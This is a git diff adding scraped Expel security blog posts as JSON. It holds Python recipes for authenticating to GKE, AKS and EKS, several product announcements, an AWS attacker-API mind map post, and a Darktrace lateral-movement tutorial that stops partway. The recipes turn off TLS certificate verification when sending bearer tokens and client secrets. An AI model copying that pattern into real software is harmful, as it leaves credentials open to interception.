token for K8s client api_endpoint = f\u2019https://{cluster.endpoint}: 443 \u2018 api_token = kubeconfig_creds.token logging.info( \u201cBuilding K8s API client\u201d ) configuration = kubernetes.client.Configuration() configuration.api_key[ \u2018authorization\u2019 ] = api_token configuration.api_key_prefix[ \u2018authorization\u2019 ] = \u2018Bearer\u2019 configuration.host = api_endpoint configuration.verify_ssl = False k8s_client = kubernetes.client.ApiClient(configuration=configuration) # Use K8s client to talk to Kubernetes API logging.info( \u201cListing nodes in this Kubernetes cluster\u201d ) core_v1 = kubernetes.client.CoreV1Api(api_client=k8s_client) print ( \u201cRetrieved Nodes:\\n\u201d , core_v1.list_node()) Connecting to Azure Kubernetes Service (AKS) How it works The recipe below uses an Azure application registration and a custom Azure role. Like Google, Microsoft put some thought into the linkages between Azure IAM and AKS. However, they\u2019ve gone through multiple support iterations and offer several ways to do authentication and authorization for AKS . This can be confusing, and takes a lot of reading to figure out. Luckily, we\u2019ve done all of that for you and can summarize. There are three ways to configure authN and authZ for AKS: Legacy auth with client certificates: Kubernetes handles authentication and authorization. Azure AD integration: Azure handles authentication, Kubernetes handles authorization. Azure RBAC for Kubernetes authorization: Azure handles authentication and authorization. We examined these options and recommend #3 for a few reasons: Your authentication and authorization policies will exist in one place (Azure IAM). Azure IAM RBAC is more user-friendly than in-cluster RBAC configurations. Azure roles are easier to audit than in-cluster rules. Based on these advantages, our Python recipe below authenticates with Azure, retrieves cluster details, and then requests an authentication token to communicate with the Kubernetes API. Prerequisites An Azure AD application registration Application must be assigned IAM permissions to get cluster details and read data in Kubernetes (this can be adjusted based on your use case) Network access to your cluster\u2019s API endpoint Python example import requests import logging import kubernetes.client # Update these to auth as your Azure AD App TENANT_ID = \u2018YOUR_TENANT_ID\u2019 CLIENT_ID = \u2018YOUR_CLIENT_ID\u2019 CLIENT_SECRET = \u2018YOUR_CLIENT_SECRET\u2019 # Update these to specify the cluster to connect to SUBSCRIPTION_ID = \u2018YOUR_SUBSCRIPTION_ID\u2019 RESOURCE_GROUP = \u2018YOUR_RESOURCE_GROUP\u2019 CLUSTER_NAME = \u2018YOUR_CLUSTER_NAME\u2019 def get_oauth_token(resource): \u201d\u2019 Retrieve an OAuth token for the provided resource \u201d\u2019 login_url = \u201chttps://login.microsoftonline.com/%s/oauth2/token\u201d % TENANT_ID payload = { \u2018grant_type\u2019 : \u2018client_credentials\u2019 , \u2018client_id\u2019 : CLIENT_ID, \u2018client_secret\u2019 : CLIENT_SECRET, \u2018Content-Type\u2019 : \u2018x-www-form-urlencoded\u2019 , \u2018resource\u2019 : resource } response = requests.post(login_url, data=payload, verify=False).json() logging.info( \u2018Got OAuth token for AKS\u2019 ) return response[ \u201caccess_token\u201d ] logging.info( \u201cRetrieving cluster endpoint\u2026\u201d ) token = get_oauth_token( \u2018https://management.azure.com\u2019 ) mgmt_url = \u201chttps://management.azure.com/subscriptions/%s\u201d % SUBSCRIPTION_ID mgmt_url += \u201c/resourceGroups/%s\u201d % RESOURCE_GROUP mgmt_url += \u201c/providers/Microsoft.ContainerService/managedClusters/%s\u201d % CLUSTER_NAME cluster = requests.get(mgmt_url, params={ \u2018api-version\u2019 : \u20182022-11-01\u2019 }, headers={ \u2018Authorization\u2019 : \u2018Bearer %s\u2019 % token} ).json() props = cluster[ \u2018properties\u2019 ] fqdn = props.get( \u2018fqdn\u2019 ) or props.get( \u2018privateFQDN\u2019 ) api_endpoint = \u2018https://%s:443\u2019 % fqdn logging.info( \u201cGot cluster endpoint\u201d , endpoint=api_endpoint) logging.info( \u201cRequesting OAuth token for AKS\u2026\u201d ) # magic resource ID that works for all AKS clusters AKS_RESOURCE_ID = \u20186dae42f8-4368-4678-94ff-3960e28e3630\u2019 api_token = get_oauth_token(AKS_RESOURCE_ID) logging.info( \u201cBuilding K8s API client\u201d ) configuration = kubernetes.client.Configuration() configuration.api_key[ \u2018authorization\u2019 ] = api_token configuration.api_key_prefix[ \u2018authorization\u2019 ] = \u2018Bearer\u2019 configuration.host = api_endpoint configuration.verify_ssl = False k8s_client = kubernetes.client.ApiClient(configuration=configuration) # Use K8s client to talk to Kubernetes API logging.info( \u201cListing nodes in this Kubernetes cluster\u201d ) core_v1 = kubernetes.client.CoreV1Api(api_client=k8s_client) print ( \u201cRetrieved Nodes:\\n\u201d , core_v1.list_node()) Connecting to Amazon Elastic Kubernetes Service (EKS) How it works AWS clearly thought about the linkages for its cloud IAM service, but hasn\u2019t built as robust an integration as Google or Microsoft. The end result is less than ideal. As much as we\u2019d love to be able to keep authN and authZ management in AWS IAM, we currently don\u2019t have that ability without installing additional third-party tools like kiam (although these tools are quickly becoming obsolete ). For this recipe, we\u2019ll focus on what\u2019s possible with native EKS clusters and leave additional third-party tooling as an exercise for you, dear reader. The recipe below uses an AWS IAM role to generate a token for EKS, which is an unusual (and not well-documented) process compared to GKE and AKS. To generate a token, we call the STS service to generate a pre-signed URL. This returns a signature which EKS accepts as a token identifying the calling user. This token authenticates the user, but requires that we rely on in-cluster RBAC policies for authZ. Prerequisites IAM role with attached policies allowing access to get cluster details and contact the API IAM assumes role credentials are exported as environment variables AWS-auth configmap is updated to grant access to IAM role In-cluster RBAC roles and RoleBindings grant privileges to cluster resources Python example import base64 import boto3 import logging import kubernetes.client AWS_REGION = \u2018YOUR_AWS_REGION\u2019 CLUSTER_NAME = \u2018YOUR_CLUSTER_NAME\u2019 class TokenGenerator( object ): \u201d\u2019 Helper class to generate EKS tokens \u201d\u2019 def __init__(self, sts_client, cluster_name): self._sts_client = sts_client self._cluster_name = cluster_name self._register_cluster_name_handlers() def _register_cluster_name_handlers(self): self._sts_client.meta.events.register( \u2018provide-client-params.sts.GetCallerIdentity\u2019 , self._retrieve_cluster_name, ) self._sts_client.meta.events.register( \u2018before-sign.sts.GetCallerIdentity\u2019 , self._inject_cluster_name_header, ) def _retrieve_cluster_name(self, params, context, **kwargs): if \u2018ClusterName\u2019 in params: context[ \u2018eks_cluster\u2019 ] = params.pop( \u2018ClusterName\u2019 ) def _inject_cluster_name_header(self, request, **kwargs): if \u2018eks_cluster\u2019 in request.context: request.headers[ \u2018x-k8s-aws-id\u2019 ] = request.context[ \u2018eks_cluster\u2019 ] def get_token(self): \u201c\u201d\u201dGenerate a presigned url token to pass to kubectl.\u201d\u201d\u201d url = self._get_presigned_url() token = \u2018k8s-aws-v1.\u2019 + base64.urlsafe_b64encode( url.encode( \u2018utf-8\u2019 ), ).decode( \u2018utf-8\u2019 ).rstrip( \u2018=\u2019 ) return token def _get_presigned_url(self): return self._sts_client.generate_presigned_url( \u2018get_caller_identity\u2019 , Params={ \u2018ClusterName\u2019 : self._cluster_name}, ExpiresIn=60, HttpMethod= \u2018GET\u2019 , ) logging.info( \u201cRetrieving cluster endpoint\u2026\u201d ) eks_client = boto3.client( \u2018eks\u2019 , AWS_REGION) resp = eks_client.describe_cluster(name=CLUSTER_NAME) api_endpoint = resp[ \u2018cluster\u2019 ][ \u2018endpoint\u2019 ] logging.info( \u2018Got cluster endpoint\u2019 , endpoint=api_endpoint) logging.info( \u201cRetrieving K8s Token\u2026\u201d ) sts_client = boto3.client( \u2018sts\u2019, AWS_REGION) api_token = TokenGenerator(sts_client, CLUSTER_NAME).get_token() logging.debug( \u2018Got cluster token\u2019 ) logging.info( \u201cBuilding K8s API client\u201d ) configuration = kubernetes.client.Configuration() configuration.api_key[ \u2018authorization\u2019 ] = api_token configuration.api_key_prefix[ \u2018authorization\u2019 ] = \u2018Bearer\u2019 configuration.host = api_endpoint configuration.verify_ssl = False k8s_client = kubernetes.client.ApiClient(configuration=configuration) # Use K8s client to talk to Kubernetes API logging.info( \u201cListing nodes in this Kubernetes cluster\u201d ) core_v1 = kubernetes.client.CoreV1Api(api_client=k8s_client) print ( \u201cRetrieved Nodes:\\n\u201d , core_v1.list_node()) Conclusion Our Workbench platform runs on Kubernetes. We\u2019ve been building on k8s for many years now and are excited to help organizations secure it. Kubernetes can be a bit intimidating, especially if you haven\u2019t had hands-on experience. We hope by sharing our insight we can advance the state of Kubernetes security more generally and get security teams more involved. We can\u2019t wait to see what people build\u2026" +} \ No newline at end of file diff --git a/introducing-24x7-monitoring-and-response-for-google.json b/introducing-24x7-monitoring-and-response-for-google.json new file mode 100644 index 0000000000000000000000000000000000000000..28b92ea6e05c5d6f732f75b5daa13e89d0953ead --- /dev/null +++ b/introducing-24x7-monitoring-and-response-for-google.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing 24x7 monitoring and response for Google ...", + "url": "https://expel.com/blog/24-7-monitoring-response-google-cloud-platform/", + "date": "Jun 23, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing 24\u00d77 monitoring and response for Google Cloud Platform Expel insider \u00b7 1 MIN READ \u00b7 PETER SILBERMAN \u00b7 JUN 23, 2020 \u00b7 TAGS: Announcement / Managed detection and response / Selecting tech / Tools If you run any workloads on Google Cloud Platform (GCP), I\u2019ll bet you can identify with one of these scenarios: You\u2019ve got a multi-cloud strategy and recently migrated some data and workflows to GCP. Now it\u2019s time to get serious about securing it. You use GCP but don\u2019t have a big enough team (or the right tech in place) to make sense of the regular barrage of GCP alerts and confusing river of logs. You\u2019re playing catch up because your dev team is running a couple workflows on GCP that you recently learned about and now it\u2019s time to secure them. That\u2019s why I\u2019m excited to tell you that today we\u2019re officially launching 24\u00d77 monitoring and response services for GCP . We now provide security support for three of the major cloud service providers (CSPs): Amazon Web Services (AWS) , Microsoft Azure and GCP . We\u2019ve heard from our customers time and time again that they need a security partner that understands the nuances of each CSP and is willing to work with the customer\u2019s cloud strategy and the security services they already have. Whether that involves a single CSP, multiple CSPs or a hybrid approach, they need one place to go to help sort through multiple environments, third-party integrations and logs with weak signals. That\u2019s where we come in. Expel monitoring and response for GCP: How it works Expel secures your GCP environment with 24\u00d77 monitoring and response. Expel integrates with both Google\u2019s Security Command Center and Operations (formerly StackDriver). Expel turns logs that represent suspicious/potentially interesting activity into alerts for our analysts to look at. Our Detection and Response engineering team spent the past six months researching various ways attackers can gain access, escalate privileges and steal data. We also have the benefit of talking to customers, learning about the risks they perceive and applying the lessons we\u2019ve learned from monitoring Azure and AWS. Our research, customer conversations and experience with other CSPs all come together to form our approach to monitoring GCP. Need better cloud security? Let\u2019s chat. Whether you\u2019re running workloads on a few cloud platforms or just testing the waters with one, this page on our website sheds more light on the cloud platforms we support, along with what we monitor and how we do it. Want to learn more or talk to a real person? Send us a note." +} \ No newline at end of file diff --git a/introducing-a-mind-map-for-aws-investigations.json b/introducing-a-mind-map-for-aws-investigations.json new file mode 100644 index 0000000000000000000000000000000000000000..08294327039432cec05e8e7fe058198fbead078d --- /dev/null +++ b/introducing-a-mind-map-for-aws-investigations.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing a mind map for AWS investigations", + "url": "https://expel.com/blog/mind-map-for-aws-investigations/", + "date": "Nov 17, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing a mind map for AWS investigations Security operations \u00b7 2 MIN READ \u00b7 DAVID BLANTON \u00b7 NOV 17, 2020 \u00b7 TAGS: Cloud security / MDR Our SOC team remediates quite a few incidents in Amazon Web Services (AWS). Some of these were surprise attacks from red teams, while others were live attackers in our customers\u2019 cloud environments. When running these incidents down, some common themes emerged about when and why attackers use different AWS APIs \u2013 and they mapped nicely to the MITRE ATT&CK tactics. We noticed that these notes were really helpful when our analysts were investigating CloudTrail logs. So we captured these AWS APIs in a mind map and loaded it into our Expel Workbench. This mind map is a TL;DR of the attack paths an attacker may take once they gain access to an AWS environment. Why do we think you\u2019ll find it useful? First, it can help analysts see the bigger picture during investigations, so they can quickly identify risk and possible compromise. Full disclosure, the AWS mind map doesn\u2019t cover every API call and the associated ATT&CK tactic. But it can be a resource during incident response and, after remediation, can help you tell the story of what happened to the rest of your team or your customer. For example, let\u2019s say you find yourself responding to a GuardDuty alert for compromised EC2 credentials. While reviewing successful AWS API calls from the external source IP address and Amazon Resource Name (ARN), you spot API calls for CreateUser followed by PutUserPolicy and AttachUserPolicy after a series of Get*, Describe* and List* calls. If this were unauthorized activity, the mind map can help piece together that this may indicate automated reconnaissance in which an attacker created a privileged user to establish persistence in your environment. We\u2019ve also used the mind map to summarize red team engagements after we\u2019ve chased them in a customer\u2019s environment. We told the story of the engagement by filling in a blank mind map with what APIs the red team used during their engagement. And these are just some examples of how the Expel AWS mind map has already been incredibly useful to us. We hope this resource will be helpful to you if you ever find yourself chasing a bad guy through the cloud. In addition to the mind map, we\u2019ve created a cheat sheet for how to use and get the most out of the mind map, along with a blank mind map that you can use during your investigations. Click here to get our AWS mind map kit sent directly to your email inbox!" +} \ No newline at end of file diff --git a/introducing-expel-for-phishing.json b/introducing-expel-for-phishing.json new file mode 100644 index 0000000000000000000000000000000000000000..e9b4b47577e32177b6307e084bb0c5dd7797784c --- /dev/null +++ b/introducing-expel-for-phishing.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing Expel for phishing", + "url": "https://expel.com/blog/introducing-expel-for-phishing/", + "date": "Oct 13, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing Expel for phishing Expel insider \u00b7 2 MIN READ \u00b7 PETER SILBERMAN \u00b7 OCT 13, 2020 \u00b7 TAGS: Company news / MDR If you\u2019ve worked in cybersecurity for a hot second, then you know crafty attackers are always busy dreaming up new ways to compromise your org \u2013 whether it\u2019s through your AWS environment or man-in-the-middle-ing your CEO\u2019s credentials. Yet one of the oldest (and still effective) tricks in the book for getting inside an org is through its employees\u2019 inboxes. Yep, we\u2019re talking about phishing. Chances are, you\u2019ve invested time to train your employees to have a keen eye for suspicious emails. If you\u2019ve been successful, they\u2019re slamming that phish button every time a malicious email lands in their inbox. And your phishing simulations are seeing good success rates. Huzzah! And now your team needs to review and investigate every single one of those emails that are reported. *Record scratch* It\u2019s time consuming, tedious and it\u2019s keeping your talented analysts from focusing on the more strategic security work you hired them to do. Finding ways to triage an abundance of phishing emails while still keeping your analysts happy and engaged isn\u2019t an easy task. In fact, we hear it all the time from our customers that it\u2019s something they struggle with. Which is exactly why we created Expel for Phishing. How Expel\u2019s managed phishing service works There are plenty of products out there to help triage phishing emails. So what makes us different? While other phishing products also surface emails they believe to be phishing, they typically stop there. But Expel takes it a step further. Our analysts have eyes on every email that is either directly forwarded to us or is delivered through a \u201creport phishing\u201d button. From there, we determine if the email is indeed a legitimate phishing attempt. And then Expel for Phishing keeps going. When we find an email that\u2019s a phishing attack, we use your endpoint detection and response (EDR) tool to see what the user did, if they\u2019re compromised and if anyone else clicked on the email. From there, we provide you with a detailed report that includes remediation recommendations \u2013 including exactly which employees clicked on the malicious email and what you need to do to shut those attackers down. If you\u2019re more of a visual learner, here\u2019s a peek at the process we just described: Expel managed phishing process Like any other services from Expel, our analysts keep you in the loop throughout the investigation and remediation processes through a dedicated Slack channel and the Expel Workbench. Drowning in phishing emails? Let us throw you a line. We\u2019re excited to help orgs of all shapes and sizes manage their phishing emails, letting their security teams get back to focusing on the security work they love. If you\u2019d like to find out more, check out our Expel for phishing page ." +} \ No newline at end of file diff --git a/introducing-expel-vulnerability-prioritization-our-new.json b/introducing-expel-vulnerability-prioritization-our-new.json new file mode 100644 index 0000000000000000000000000000000000000000..16cfa0a50345a1dc821cf6d951a18b4b0cc500d3 --- /dev/null +++ b/introducing-expel-vulnerability-prioritization-our-new.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing Expel Vulnerability Prioritization: our new ...", + "url": "https://expel.com/blog/introducing-expel-vulnerability-prioritization-our-new-solution-for-helping-identify-the-highest-risk-vulnerabilities/", + "date": "Apr 20, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing Expel Vulnerability Prioritization: our new solution for helping identify the highest-risk vulnerabilities Security operations \u00b7 3 MIN READ \u00b7 MATT PETERS \u00b7 APR 20, 2023 \u00b7 TAGS: MDR In ancient Greece there was a monster called a Lernean Hydra. It had nine heads and, if you cut one off, two more grew in its place. Between that, Sisyphus endlessly rolling a rock up a hill, and Prometheus chained to a rock perpetually being eaten by vultures, the ancient Greeks sure had a deep bench of unending torments. Fast forward to today. In 2014, NIST had to add a digit to the CVE format because the number of vulnerabilities discovered in a calendar year could no longer be counted with 4 digits. The number has only grown\u2013there were over 26 thousand vulnerabilities reported in 2022! But we can\u2019t just put our heads in the sand. According to a recent Forrester report , software vulnerabilities are the second-most reported attack vector. There has got to be something we can do. Figuring out which vulnerabilities matter most is important, but hugely difficult. Static methods like the Common Vulnerability Scoring System (CVSS) don\u2019t solve the whole problem because they don\u2019t take into account dynamic factors impacting the likelihood of exploit\u2013things like \u201cis there a public version?\u201d and \u201cdo we have a compensating control?\u201d are all things you may need to consider. Even if you do something like \u201cjust patch the criticals,\u201d the problem is still intractably huge\u2013 those increased by 59% in 2022 . You may also be challenged because your team may not fully own the vulnerability management process. Other stakeholders may include risk management, IT operations, or line of business\u2013and there may be multiple teams within IT based on who \u201cowns\u201d the technology where the vulnerabilities exist. Because multiple teams share the vulnerability remediation process, it\u2019s often difficult to coordinate the metrics and tracking of fixes. In some cases, organizations might not even get better security outcomes. For example, some organizations have goals around remediating a specific number or percentage of vulnerabilities, without qualifying whether those vulnerabilities pose an actual threat to the business. Here we find ourselves\u2013fighting a monster or chained to a rock\u2013pick your favorite ancient Greek torment. We have to do something and, as a first step, we want to figure out how to prioritize better. That\u2019s why we\u2019re now offering Expel Vulnerability Prioritization , our newest managed service that takes the burden off security teams by doing the triage and investigation of unresolved security issues for them\u2013to identify the vulnerabilities that are putting customers at the highest level of risk. If you\u2019re using a Tenable or Rapid7 vulnerability management solution, then Expel Vulnerability Prioritization is for you. We take these solutions a step further, accelerating your remediation process by letting you know exactly which vulnerabilities detected pose the greatest risk. By connecting the dots between your Tenable or Rapid7 on-prem vulnerability data, and priority assets in your Expel Managed Detection and Response (MDR) environment, we assess your risk and the potential impact of your vulnerabilities against external threat intel and what attackers are actually exploiting in the wild. You get a prioritized list of vulnerabilities with recommendations on next steps for immediate action. This reduces the burden on your SecOps and IT teams with: Risk-based prioritization, by matching internal context for the risk with the degree of exploitability A dedicated team to investigate and provide guidance A clear assessment and prompt reporting of criticality and potential impact if the issue stays unresolved Expel Vulnerability Prioritization employs a risk-based prioritization model that starts with ingesting endpoint vulnerability scanner data from Tenable.io Vulnerability Management and Rapid7\u2019s InsightVM. We then match that data to external threat intelligence, and what our SOC is seeing across our MDR customers\u2019 environments to get more context and narrow down the list of vulnerabilities most likely to impact your organization. Like all Expel products, we use a software-first approach, ingesting information from your existing security devices and technology, and applying our own automations (or bots) to investigate and triage. Then our Vulnerability Analysts further investigate and analyze to qualify what vulnerabilities are urgent, and what\u2019s recommended for remediation during the next patching cycle. Our team then notifies you about urgent and recommended vulnerabilities with remediation guidance. Here\u2019s another look at our risk-based prioritization model: Expel Vulnerability Prioritization aims to accelerate your prioritization and remediation process so you can improve visibility and decision-making, spend less time triaging and investigating vulnerabilities, and more time patching. It can also strengthen your detection and response processes by shutting down attack vectors that could be exploited. Expel Vulnerability Prioritization is another solution powered by our security operations platform, Expel Workbench \u2122, complementing our market-leading MDR, phishing, and threat hunting offerings. We enable you to take a proactive approach to investigation and remediation, and eliminate critical risks early in the cybersecurity kill chain. If you\u2019re attending the RSA Conference in San Francisco next week, feel free to stop by for a demo at booth #954 in the South Hall. If you\u2019re not going to RSA, feel free to contact us for more details." +} \ No newline at end of file diff --git a/introducing-expel-workbenchtm-for-amazon-web-services.json b/introducing-expel-workbenchtm-for-amazon-web-services.json new file mode 100644 index 0000000000000000000000000000000000000000..bb823439af0c19fb9baa7e4680d8eae25d5cab49 --- /dev/null +++ b/introducing-expel-workbenchtm-for-amazon-web-services.json @@ -0,0 +1,6 @@ +{ + "title": "Introducing Expel Workbench\u2122 for Amazon Web Services ...", + "url": "https://expel.com/blog/expel-workbench-for-amazon-web-services/", + "date": "Feb 1, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Introducing Expel Workbench\u2122 for Amazon Web Services (AWS) Expel insider \u00b7 3 MIN READ \u00b7 PETER SILBERMAN \u00b7 FEB 1, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools If you\u2019re a growing company that was \u201cborn in the cloud\u201d, revenue, uptime, new features and innovation are likely some of the big priorities driving your org. If you had time (and a little forethought) while you were busy building you might\u2019ve baked some security into your CI/CD pipeline. But monitoring security alerts for your application that\u2019s running in AWS isn\u2019t exactly at the top of your to-do list \u2026 until one of your big customers (or lawyers or auditors) start asking pointed questions about how you\u2019re monitoring and securing their data in AWS. Sound familiar? At this point, most of the customers we work with started asking themselves a few questions: How do I detangle this confusing (and ever-changing) array of AWS services, CloudTrail logs and alerts? Where can I find someone (or the budget to hire someone) who can sift through AWS security alerts and tell me which ones are real risks? What\u2019s the \u201cplaybook\u201d for investigating and fixing AWS security alerts? Then they set out in search of a product to help \u2026 and waded through miles of marketing fluff and ended up more than a little irked. An \u201ceasy\u201d button for AWS security The scenario (and frustration) I describe above \u2013 which we\u2019ve heard from orgs in all sorts of industries \u2013 is what inspired us to create Expel Workbench\u2122 for AWS. We think of it as an \u201ceasy\u201d button to monitor and investigate potential security risks in your AWS environment. It takes all of your AWS logs and alerts and tells you which ones are real risks (and why all the others aren\u2019t). How it works: Expel Workbench only surfaces Expel-validated alerts. Our ability to validate alerts is based on the experience of our SOC analysts who\u2019ve run thousands of investigations in AWS environments. Expel Workbench also comes with our bot, Ruxie\u2122, who automatically investigates alerts and gathers additional information before surfacing them up to you, so you\u2019ve got data you need to make quick and accurate decisions. In addition to gotta-fix-that-now alerts like databases going public or compromised instance credentials, Expel Workbench also tells you when there are \u201cinteresting\u201d things like risky authentications or unusual IAM policy changes that may not be immediate risks but are probably something you want to know about. We don\u2019t just rely on AWS GuardDuty, we surface observations and correlations out of your CloudTrail Logs too . By filtering out false positives and enriching the alerts that matter with investigative details like where the user has authenticated from in the past 45 days or what APIs the AWS role has been observed making in the past 30 days, Expel Workbench shrinks the time it takes you to confirm if an alert is truly something you and your team need to look into. How Expel Workbench\u2122 for AWS makes your life (and your team\u2019s) easier If security is something you do when you\u2019ve \u201cgot time\u201d or the thought of hiring (and retaining) a team of AWS security analysts makes you want to run away screaming, it\u2019s a good bet that Expel Workbench can help. How? With Expel Workbench, you\u2019ll: Become an expert AWS investigator and be able to perform advanced investigations and incident response with a base-level of AWS expertise. It\u2019ll tell you what you need to look at and provide guides on how to respond. Spend less time detecting and more time fixing security risks because it automates alert review and adds investigative details. You\u2019ll have more time back so you can put new security controls in place that prevent security issues. Avoid buying more tools because you don\u2019t need to string together lots of tools to process, analyze and respond to AWS security alerts (and then figure out and train your team on how to use them). Avoid hiring a squad of cloud security gurus who are difficult to find in the first place. We\u2019ve got that covered. Sound like something that would help your org? We\u2019d love to answer your burning questions. Check out our Expel Workbench for AWS page to learn more, or start a free trial." +} \ No newline at end of file diff --git a/investigating-darktrace-alerts-for-lateral-movement.json b/investigating-darktrace-alerts-for-lateral-movement.json new file mode 100644 index 0000000000000000000000000000000000000000..c08bdd16cca3e837a6239cae315b868e6e6067e7 --- /dev/null +++ b/investigating-darktrace-alerts-for-lateral-movement.json @@ -0,0 +1,6 @@ +{ + "title": "Investigating Darktrace alerts for lateral movement", + "url": "https://expel.com/blog/investigating-darktrace-alerts-for-lateral-movement/", + "date": "Jun 21, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Investigating Darktrace alerts for lateral movement Tips \u00b7 10 MIN READ \u00b7 TYLER FORNES \u00b7 JUN 21, 2018 \u00b7 TAGS: Darktrace / Example / Get technical / Tools Expel analysts get to use a lot of really cool technology including Darktrace and Carbon Black (Cb Response). It\u2019s one of the perks of delivering a service that integrates with so many tools. Each product we use is critical to an investigation. But they provide value in different ways. For example, some help us detect, while others are more valuable when we\u2019re scoping an investigative lead. What\u2019s an investigative lead you say? Well \u2026 that\u2019s basically how we think of alerts. And we see our job as following the trail of those leads so we can give our clients answers. For this, we rely on an investigative mindset \u2013 which we apply to all of the network, endpoint and SIEM products we use during an investigation. In this post, I\u2019m going to focus on Darktrace. I\u2019ll highlight some of our favorite features and then dive into a typical investigation to show you how our analysts triage a Darktrace alert. In this case, we\u2019ll be looking at an anomalous connection that Darktrace identified and I\u2019ll share some of the investigative techniques we commonly use to filter down the available data. A quick overview of Darktrace If you\u2019re not familiar with Darktrace, there are a few things you should know. First and foremost, it\u2019s a far cry from your traditional IDS/IPS. In fact, Darktrace is completely signatureless. Instead, it creates a \u201cmodel\u201d of what \u201cnormal\u201d network activity looks like for your organization. When network traffic deviates from that model, Darktrace flags it as suspicious activity. Then, Darktrace tunes these models with machine learning and artificial intelligence and enriches the involved hosts with Active Directory information to add some pretty cool dynamic asset identification and tracking. This means it can identify true hostname and OS information of the involved hosts to help an analyst confirm abnormal network behavior. These features make Darktrace different from a lot of other detection-centric network security tools because it\u2019s looking for behaviors you see during a compromise instead of specific indicators. It\u2019s important to understand the ins and outs of Darktrace\u2019s detection approach because it changes the way you triage those alerts. In short, you can think of Darktrace alerts as high-fidelity initial leads (for example, an anomalous connection / POST to PHP on a new external host) versus something more tactical and specific (like a Snort signature for a string in a specific PHP webshell). Both will likely detect the same known-bad activity. However, the Darktrace alert will likely detect far more unknown-bad since we\u2019re not relying on constantly updated signatures to keep up with attacker TTPs. In any case, abnormal network events that are identified by Darktrace\u2019s Enterprise Immune System are labeled as \u201cmodel breaches\u201d since they\u2019re activity that has breached the known model of your network. That\u2019s why we think of these alerts as initial leads. There\u2019s something there \u2026 but it needs a little more looking into to understand exactly what it is. Fortunately, Darktrace provides a bunch of features to make this easy. Our favorite Darktrace features There are a ton of neat features in Darktrace. But if we had to pick three that our analysts find the most helpful in their day-to-day investigations it would be these: Advanced log search: Bro logs generated by Darktrace are indexed and accessible via a Kibana-like query structure. This allows us to quickly and efficiently scope an incident or hunt for threats across the entire organization without the need for exhaustive data collection and manual parsing by an analyst. Full packet capture: Custom, full packet captures can be quickly generated based on time and involved IPs. These \u201con-demand\u201d packet captures are great for uncovering additional evidence that\u2019s tailored, only including the required data and eliminating the need to filter large packet capture offline. Asset identification: Assets Darktrace identifies are enriched with Active Directory (AD) information including DNS hostname. You even have the option to customize tags to make valuable assets easier to identify. This feature helps analysts make quick decisions about the severity of a model breach assists in determining what further evidence may be available. Detecting and investigating lateral movement with Darktrace Attacks carried out by advanced attackers have one thing in common \u2013 lateral movement. That\u2019s because attackers almost never land on the box that has the data they\u2019re after. To complete their mission they need to navigate to the endpoint where their desired data lives (that is, they\u2019ve got to \u201cmove laterally\u201d). There are only a few ways to do it and it can be difficult to spot with traditional network and endpoint tools. That\u2019s why it\u2019s a natural choke point when you\u2019re detecting and investigating attacks (to learn more, check out the MITRE ATT&CK framework, which catalogs all of the ways attackers can move laterally ). Darktrace\u2019s approach is well suited to uncover lateral movement. So let\u2019s dive into a Darktrace \u201cmodel breach\u201d and look at how some of Darktrace\u2019s key features help us effectively investigate a lateral movement technique that can be difficult to analyze using traditional IDS. The technique we\u2019ll be examining is remote file copy over SMB . Getting the lay of the land: the Darktrace search page Before we dive into the alert it\u2019s helpful to understand what\u2019s going on behind the scenes in Darktrace. As you can imagine, SMB traffic is extremely common on most networks. That can make hunting through all the data a challenge \u2013 especially in a large environment. Fortunately, Darktrace has a few advanced search features that can help us. From the Darktrace homepage, let\u2019s navigate to the advanced search page. This is the view where I like to do most of my analysis. Essentially, it\u2019s a Kibana-like representation of the Bro data that Darktrace has indexed. If you\u2019re a security analyst, this is the view where you\u2019ll run most of your queries to scope an alert, investigate or hunt. In this case, since we want to specifically investigate SMB traffic in the environment, let\u2019s select a timeframe of last 15 minutes and select the @type field. The type field allows us to tap into Darktrace analytics and see a table organized by the most commonly seen network protocols. Selecting the terms button, will give you to a complete list of this data. Since we\u2019re focusing on malicious file copy/execution via SMB, let\u2019s check out the smb_readwrite category, since it\u2019s where I\u2019d expect to find this type of activity. As you can see, Darktrace does a really great job of parsing and stacking the Bro logs so it\u2019s easy for an analyst to start identifying malicious activity. By applying a simple filter of @type:\u201dsmb_readwrite\u201d and *.exe (or @type:\u201dsmb_readwrite\u201d AND @fields.mime:\u201dapplication/x-dosexec\u201d to search by MIME type) we can identify any obviously named executables being transferred via SMB in a given timeframe. We\u2019d expect to see a lot of legitimate traffic in these results since many enterprise applications handle deployment, updates and other administrative functions over the SMB protocol. As the screenshot below shows (not all results shown), we\u2019re seeing CarbonBlackClientSetup.exe being transferred over SMB quite a bit in this environment. The high volume of activity combined with the large number of unique hosts involved means we can infer this is probably the result of legitimate admin activity, rather than an advanced attacker attempting to move stealthily through the environment. In reality, this would be a pretty exhausting way to find malicious SMB transfers. But it\u2019s a good, simple example of how we can use the Darktrace\u2019s analysis features to start identifying malicious connections in an environment. OK. Now that we\u2019ve learned how to use some of Darktrace\u2019s more advanced analysis features, let\u2019s apply this knowledge to a Darktrace alert. Investigating a Darktrace alert Benign alerts are one of the most challenging types of alerts for a security analyst to triage. They\u2019re also tricky to define. Here at Expel, we define benign alerts as ones where something matches the intention of the signature, but \u2013 after further investigation and gathering additional context \u2013 aren\u2019t indicative of a security incident. Since attackers often use legitimate tools, it usually boils down to concluding that a legitimate tool is, in fact, being used legitimately. As mentioned before, Darktrace\u2019s Enterprise Immune System requires a learning period to identify what\u2019s \u201cnormal\u201d (and thus what\u2019s \u201cnot normal\u201d). Knowing this, we can assume that abnormal user traffic will likely trigger model breaches as the Enterprise Immune System begins to learn and identify events that match attacker behavior, even if they\u2019re the result of legitimate user activity. Step one: interpreting the model breach Staying with this thread of remote file execution via SMB, we can see this Darktrace alert was triggered via a violation of one of the pre-packaged model breaches for Device / AT Service Scheduled Task. To triage this specific alert appropriately, we need to know answers to the following questions: What were the triggers that caused the model to alert? Which host was the Scheduled Task created on? Were any files transferred? 